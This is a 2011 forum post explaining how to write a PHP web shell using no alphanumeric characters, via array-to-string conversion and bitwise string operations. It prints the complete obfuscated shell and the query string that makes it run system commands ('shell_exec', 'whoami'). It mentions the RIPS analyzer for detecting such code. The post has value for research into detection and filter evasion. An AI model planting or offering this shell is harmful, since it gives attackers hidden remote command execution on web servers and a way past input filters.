denjacker Posted September 24, 2011 Report Posted September 24, 2011 So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: \107 is “G” if I could construct the “107? and add the backslash to the beginning maybe I could construct “G”. It worked like this:$_=+"";$_=(++$_)+(++$_)+(++$_)+(++$_);$__=+"";$__++;$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107$___="\\$___";But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell.Onto the second technique, PHP allows you to use bitwise operators on strings 'a'|'b';//c!We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell <?$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>The first part converts a string into an array by attempting to assign to “0? position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0×6, “A”|0×5 and “A^0×15?. There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.To call the shell you’d use:?_=shell_exec&__=whoamiDon’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.Non alphanumeric code in PHP Quote
